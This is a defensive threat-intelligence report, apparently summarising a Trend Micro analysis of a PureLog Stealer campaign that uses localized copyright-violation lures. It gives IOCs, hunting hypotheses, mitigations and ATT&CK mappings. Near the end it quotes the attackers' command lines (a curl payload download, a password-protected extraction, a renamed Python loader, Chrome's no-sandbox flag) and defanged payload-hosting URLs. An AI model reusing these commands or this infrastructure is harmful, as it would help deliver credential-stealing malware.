7 minhigh
Copyright Lures Mask a Multi‑Stage PureLog Stealer Attack on Key Industries
A targeted campaign is delivering the PureLog Stealer via localized copyright violation lures. The attack employs a sophisticated multi-stage infection chain, utilizing a Python-based loader to bypass AMSI, establish registry persistence, and execute the final .NET stealer entirely in memory to evade detection.
Sens:■ ImmediateConf:highAnalyzed:2026-03-19reports
Authors: Mohamed Fahmy, Allixon Kristoffer Francisco, Jonna Santos
ActorsPureLog Stealer
Source:
Trend Micro
IOCs · 4
- domainlogs[.]bestshopingday[.]comDomain strongly associated with PureLog Stealer C2
- domainquickdocshare[.]comPayload and decryption key hosting infrastructure
- sha2561539dab6099d860add8330bf2a008a4b6dc05c71f7b4439aebf431e034e5b6ffNotice of Alleged Violation of Intellectual Property Rights.exe (Initial Lure)
- sha25635efc4b75a1d70c38513b4dfe549da417aaa476bf7e9ebd00265aaa8c7295870Malicious ZIP lure containing the initial executable
Key Takeaways
- The PureLog stealer campaign uses highly targeted, language-matched copyright violation lures to trick victims.
- A multi-stage delivery chain uses encrypted payloads and remote key retrieval to evade static analysis.
- The malware relies on a Python-based loader and dual .NET loaders for fileless, in-memory execution.
- The loader integrates AMSI bypass, registry persistence, screenshot capture, and victim fingerprinting.
- Targeted organizations are primarily in the healthcare, government, hospitality, and education sectors.
Affected Systems
- Windows OS (specifically Windows 11 64Bit noted in telemetry)
- Google Chrome
- Microsoft Edge
Attack Chain
The attack begins when a user executes a malicious executable disguised as a localized copyright violation notice. This executable opens a decoy PDF while silently downloading an encrypted payload and its decryption key from a remote server using curl with a custom User-Agent. A renamed WinRAR utility extracts the payload, which includes a Python interpreter renamed as svchost.exe and an obfuscated Python script named instructions.pdf. The Python script bypasses AMSI, establishes registry persistence, gathers system information, and reflectively loads dual .NET loaders that execute the final PureLog Stealer payload entirely in memory.
Detection Availability
- YARA Rules: No
- Sigma Rules: No
- Snort/Suricata Rules: No
- KQL Queries: No
- Splunk SPL Queries: No
- EQL Queries: No
- Other Detection Logic: Yes
- Platforms: TrendAI Vision One
The article mentions a TrendAI Vision One detection model for 'Executable Download via Google Ads Malvertising' and provides a Vision One hunting query for PureLog Stealer artifacts.
Detection Engineering Assessment
EDR Visibility: High — The attack generates significant process creation events (cmd, curl, renamed executables), registry modifications, and PowerShell execution that EDRs can easily capture. Network Visibility: Medium — While the C2 traffic is HTTPS, the use of a highly anomalous User-Agent ('curl/meow_meow') and direct IP connections provide strong network detection opportunities. Detection Difficulty: Moderate — The fileless execution and AMSI bypass make static detection difficult, but the noisy staging process (curl, renamed WinRAR, svchost in Public folder) provides clear behavioral indicators.
Required Log Sources
- Process Creation (Event ID 4688 / Sysmon 1)
- Registry Events (Sysmon 12/13/14)
- PowerShell Operational Logs (Event ID 4104)
- Network Connections (Sysmon 3)
Hunting Hypotheses
| Hypothesis | Telemetry | ATT&CK Stage | FP Risk |
|---|---|---|---|
| Look for curl.exe executions utilizing anomalous or custom User-Agent strings, specifically 'curl/meow_meow'. | Process Creation, Command Line | Command and Control / Payload Delivery | Low |
| Identify executions of svchost.exe originating from non-standard directories like C:\Users\Public\Windows. | Process Creation | Execution | Low |
| Detect archive extraction utilities (like WinRAR) executing with a .png extension to extract files. | Process Creation, Command Line | Defense Evasion / Extraction | Low |
| Monitor for PowerShell commands querying the SecurityCenter2 WMI namespace for AntivirusProduct. | Process Creation, PowerShell Logs | Discovery | Medium |
| Look for registry modifications to HKCU\Software\Microsoft\Windows\CurrentVersion\Run setting the value 'SystemSettings' to a command line execution. | Registry Events | Persistence | Low |
Control Gaps
- Static AV scanning (bypassed via fileless execution and AMSI patching)
- Network inspection (bypassed via HTTPS and encrypted payloads)
Key Behavioral Indicators
- svchost.exe executing in C:\Users\Public\Windows\
- curl.exe with -A 'curl/meow_meow'
- WinRAR renamed to .png
- instructions.pdf passed as an argument to an executable
False Positive Assessment
- Low. The combination of renamed executables (svchost.exe for Python, .png for WinRAR), custom User-Agents, and specific directory paths (C:\Users\Public\Windows) are highly specific to this campaign and unlikely to occur in benign environments.
Recommendations
Immediate Mitigation
- Block known C2 IPs and domains associated with PureLog Stealer.
- Search endpoint telemetry for svchost.exe executing from C:\Users\Public\Windows.
- Isolate hosts exhibiting the identified curl.exe or renamed WinRAR behaviors.
Infrastructure Hardening
- Restrict the execution of curl.exe and other LOLBins unless explicitly required by administrative processes.
- Implement application control to prevent execution from C:\Users\Public\ and its subdirectories.
User Protection
- Deploy EDR solutions capable of detecting in-memory reflective loading and AMSI patching.
- Ensure web browsers are updated and hardened against malicious extensions and sandbox escapes.
Security Awareness
- Train employees to recognize localized phishing lures, especially those disguised as legal or copyright violation notices.
- Emphasize the danger of executing unexpected files downloaded from the internet, even if they appear as documents.
MITRE ATT&CK Mapping
- T1566.001 - Phishing: Spearphishing Attachment
- T1036.003 - Masquerading: Rename System Utilities
- T1059.003 - Command and Scripting Interpreter: Windows Command Shell
- T1059.001 - Command and Scripting Interpreter: PowerShell
- T1140 - Deobfuscate/Decode Files or Information
- T1562.001 - Impair Defenses: Disable or Modify Tools
- T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder
- T1055 - Process Injection
- T1113 - Screen Capture
- T1518.001 - Software Discovery: Security Software Discovery
- T1620 - Reflective Code Loading
Additional IOCs
- Ips:
172[.]64[.]80[.]1- Outbound connection observed during infection chain (Cloudflare)64[.]40[.]154[.]96- Outbound connection observed during infection chain (Tier.Net Technologies LLC)
- Domains:
dq[.]bestshoppingday[.]com- Domain associated with the campaign infrastructuremh[.]bestshopingday[.]com- Domain associated with the campaign infrastructurelogs[.]bestsaleshoppingday[.]com- Domain associated with the campaign infrastructurecdn[.]eideasrl[.]it- Source URL domain for the malicious ZIP lure
- Urls:
hxxps://quickdocshare[.]com/DQ- URL used to download the encrypted payload (_invoice.pdf)hxxps://quickdocshare[.]com/DQ/key- URL used to remotely retrieve the decryption passwordhxxps://cdn[.]eideasrl[.]it/Notice%20of%20Alleged%20Violation%20of%20Intellectual%20Property%20Rights_1770380091603.zip- Download URL for the malicious ZIP lure
- File Hashes:
ac591adea9a2305f9be6ae430996afd9b7432116f381b638014a0886a99c6287(SHA256) - urlmon.dll (shellcode loader)f4532fc1e5d53a732fcc883f7125ceb06b985048(SHA1) - svchost.exe (renamed python.exe)
- Registry Keys:
HKCU\Software\Microsoft\Windows\CurrentVersion\Run\SystemSettings- Registry key used for persistence by the Python loaderAppModel\StateRepository\CacheVersion- Registry key used as a state flag to prevent duplicate C2 exfiltration
- File Paths:
C:\Users\Public\Windows\svchost.exe- Path to the renamed Python interpreterC:\Users\Public\Windows\instructions.pdf- Path to the obfuscated Python loader script.\_\invoice.pdf- Path to the downloaded encrypted payload container.\_\FILE_2025년_재직증명서_원본.png- Path to the renamed WinRAR executable used for extraction.\_\document.pdf- Path to the decoy PDF document
- Command Lines:
- Purpose: Download encrypted payload using a custom User-Agent | Tools:
curl.exe| Stage: Payload Delivery |curl -A "curl/meow_meow" -s -k -L - Purpose: Extract encrypted payload using a renamed WinRAR executable and a dynamically retrieved password | Tools:
WinRAR,cmd.exe| Stage: Extraction / Defense Evasion |x -p"%i" ".\_\invoice.pdf" "C:\Users\Public\" -y - Purpose: Execute the obfuscated Python loader script using a renamed Python interpreter | Tools:
python.exe| Stage: Execution |"C:\Users\Public\Windows\svchost.exe" "instructions.pdf" - Purpose: Enumerate installed Antivirus products via WMI | Tools:
powershell.exe,WMI| Stage: Discovery - Purpose: Launch Chrome/Edge as a renderer process with sandbox disabled for evasion | Tools:
chrome.exe,msedge.exe| Stage: Defense Evasion / Process Injection |--type=renderer --extension-process --no-sandbox
- Purpose: Download encrypted payload using a custom User-Agent | Tools:
- Other:
curl/meow_meow- Custom User-Agent string used by curl during payload downloadDgrfauysx.exe- Stage 1 .NET loader executed in memoryFsywsuac.exe- Stage 1 .NET loader executed in memory (redundancy path)